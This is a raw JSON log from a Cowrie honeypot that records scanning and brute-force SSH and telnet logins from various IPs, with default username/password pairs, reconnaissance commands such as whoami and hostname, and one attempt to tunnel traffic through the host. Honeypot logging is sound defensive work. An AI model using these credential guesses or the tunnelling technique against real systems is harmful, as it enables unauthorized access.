{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:30:16.414717Z","src_ip":"212.227.235.229","session":"d90d5b3ee964"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-28T22:30:16.723828Z","src_ip":"212.227.235.229","session":"d90d5b3ee964"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:17.905172Z","src_ip":"212.227.235.229","session":"d90d5b3ee964"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48866,"dst_ip":"1.2.3.4","dst_port":22,"session":"440145781438","protocol":"ssh","message":"New connection: 212.227.235.229:48866 (1.2.3.4:22) [session: 440145781438]","sensor":"my-vps","timestamp":"2025-08-28T22:30:19.144270Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:19.385989Z","src_ip":"212.227.235.229","session":"440145781438"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37873,"dst_ip":"1.2.3.4","dst_port":23,"session":"a515c16153b5","protocol":"telnet","message":"New connection: 212.227.235.229:37873 (1.2.3.4:23) [session: a515c16153b5]","sensor":"my-vps","timestamp":"2025-08-28T22:30:28.044044Z"}
{"eventid":"cowrie.session.closed","duration":31.22790217399597,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:30:59.271874Z","src_ip":"212.227.235.229","session":"a515c16153b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36006,"dst_ip":"1.2.3.4","dst_port":22,"session":"08b421d8b98c","protocol":"ssh","message":"New connection: 212.227.235.229:36006 (1.2.3.4:22) [session: 08b421d8b98c]","sensor":"my-vps","timestamp":"2025-08-28T22:31:06.129111Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xe9?\u0018\\xbe\u0004`Dje\\xa2\\xb6\\xf8[\\x974\u0003j\\xd8\\xc4cb\\x8f\\xd9\\xe6\u0003F\\xdb\\xf1\\xad*\u001c'\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xe9?\u0018\\xbe\u0004`Dje\\xa2\\xb6\\xf8[\\x974\u0003j\\xd8\\xc4cb\\x8f\\xd9\\xe6\u0003F\\xdb\\xf1\\xad*\u001c'\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T22:31:06.130286Z","src_ip":"212.227.235.229","session":"08b421d8b98c"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:31:06.131416Z","src_ip":"212.227.235.229","session":"08b421d8b98c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:32:34.815597Z","src_ip":"212.227.235.229","session":"8defedff7f69"}
{"eventid":"cowrie.session.closed","duration":180.2315559387207,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:32:34.819091Z","src_ip":"212.227.235.229","session":"8defedff7f69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35844,"dst_ip":"1.2.3.4","dst_port":22,"session":"296ce7a14f37","protocol":"ssh","message":"New connection: 212.227.125.160:35844 (1.2.3.4:22) [session: 296ce7a14f37]","sensor":"my-vps","timestamp":"2025-08-28T22:34:24.246070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:34:25.557475Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:34:25.558567Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.login.success","username":"root","password":"senha","message":"login attempt [root/senha] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:34:30.900112Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:34:32.448256Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T22:34:32.448992Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:34:33.272513Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:34:33.274187Z","src_ip":"212.227.125.160","session":"296ce7a14f37"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":52714,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7053c602e36","protocol":"ssh","message":"New connection: 201.148.180.50:52714 (1.2.3.4:22) [session: c7053c602e36]","sensor":"my-vps","timestamp":"2025-08-28T22:34:42.917350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:34:43.819464Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:34:43.820246Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":56068,"dst_ip":"1.2.3.4","dst_port":22,"session":"739c8f1b80a4","protocol":"ssh","message":"New connection: 196.251.115.108:56068 (1.2.3.4:22) [session: 739c8f1b80a4]","sensor":"my-vps","timestamp":"2025-08-28T22:34:46.089630Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:34:46.106327Z","src_ip":"196.251.115.108","session":"739c8f1b80a4"}
{"eventid":"cowrie.login.success","username":"root","password":"senha","message":"login attempt [root/senha] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:34:50.214344Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:34:53.183752Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T22:34:53.184570Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:34:55.173677Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:34:55.174824Z","src_ip":"201.148.180.50","session":"c7053c602e36"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":14811,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fc4146fc632","protocol":"ssh","message":"New connection: 80.94.95.15:14811 (1.2.3.4:22) [session: 4fc4146fc632]","sensor":"my-vps","timestamp":"2025-08-28T22:36:03.110009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:36:03.110976Z","src_ip":"80.94.95.15","session":"4fc4146fc632"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:36:03.162075Z","src_ip":"80.94.95.15","session":"4fc4146fc632"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T22:36:04.283793Z","src_ip":"80.94.95.15","session":"4fc4146fc632"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:36:05.338942Z","src_ip":"80.94.95.15","session":"4fc4146fc632"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58824,"dst_ip":"1.2.3.4","dst_port":22,"session":"780b3f53d405","protocol":"ssh","message":"New connection: 217.72.205.35:58824 (1.2.3.4:22) [session: 780b3f53d405]","sensor":"my-vps","timestamp":"2025-08-28T22:36:23.751906Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:36:23.753097Z","src_ip":"217.72.205.35","session":"780b3f53d405"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":57894,"dst_ip":"1.2.3.4","dst_port":22,"session":"d384a3789d85","protocol":"ssh","message":"New connection: 196.251.115.108:57894 (1.2.3.4:22) [session: d384a3789d85]","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.351357Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17672,"dst_ip":"1.2.3.4","dst_port":22,"session":"d80e184ebb0f","protocol":"ssh","message":"New connection: 212.227.235.229:17672 (1.2.3.4:22) [session: d80e184ebb0f]","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.417912Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.419209Z","src_ip":"212.227.235.229","session":"d80e184ebb0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":18012,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f6ab110b282","protocol":"ssh","message":"New connection: 212.227.235.229:18012 (1.2.3.4:22) [session: 5f6ab110b282]","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.552700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.553447Z","src_ip":"212.227.235.229","session":"5f6ab110b282"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.635043Z","src_ip":"196.251.115.108","session":"d384a3789d85"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.636061Z","src_ip":"196.251.115.108","session":"d384a3789d85"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T22:38:29.689744Z","src_ip":"212.227.235.229","session":"5f6ab110b282"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:38:30.095033Z","src_ip":"212.227.235.229","session":"5f6ab110b282"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T22:38:30.230926Z","session":"5f6ab110b282"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T22:38:30.307881Z","src_ip":"196.251.115.108","session":"d384a3789d85"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:38:31.533708Z","src_ip":"196.251.115.108","session":"d384a3789d85"}
{"eventid":"cowrie.session.connect","src_ip":"71.6.134.232","src_port":37772,"dst_ip":"1.2.3.4","dst_port":22,"session":"de74867655d4","protocol":"ssh","message":"New connection: 71.6.134.232:37772 (1.2.3.4:22) [session: de74867655d4]","sensor":"my-vps","timestamp":"2025-08-28T22:38:44.292447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:38:44.293432Z","src_ip":"71.6.134.232","session":"de74867655d4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T22:38:44.466697Z","src_ip":"71.6.134.232","session":"de74867655d4"}
{"eventid":"cowrie.session.connect","src_ip":"203.33.225.46","src_port":54522,"dst_ip":"1.2.3.4","dst_port":23,"session":"955df138e62e","protocol":"telnet","message":"New connection: 203.33.225.46:54522 (1.2.3.4:23) [session: 955df138e62e]","sensor":"my-vps","timestamp":"2025-08-28T22:38:46.645747Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:38:54.292288Z","src_ip":"71.6.134.232","session":"de74867655d4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":43736,"dst_ip":"1.2.3.4","dst_port":22,"session":"2327f075d12d","protocol":"ssh","message":"New connection: 196.251.115.108:43736 (1.2.3.4:22) [session: 2327f075d12d]","sensor":"my-vps","timestamp":"2025-08-28T22:39:26.550334Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:39:26.765287Z","src_ip":"196.251.115.108","session":"2327f075d12d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":46942,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e5856aa7d1e","protocol":"ssh","message":"New connection: 196.251.115.108:46942 (1.2.3.4:22) [session: 5e5856aa7d1e]","sensor":"my-vps","timestamp":"2025-08-28T22:39:26.767307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:39:27.019481Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
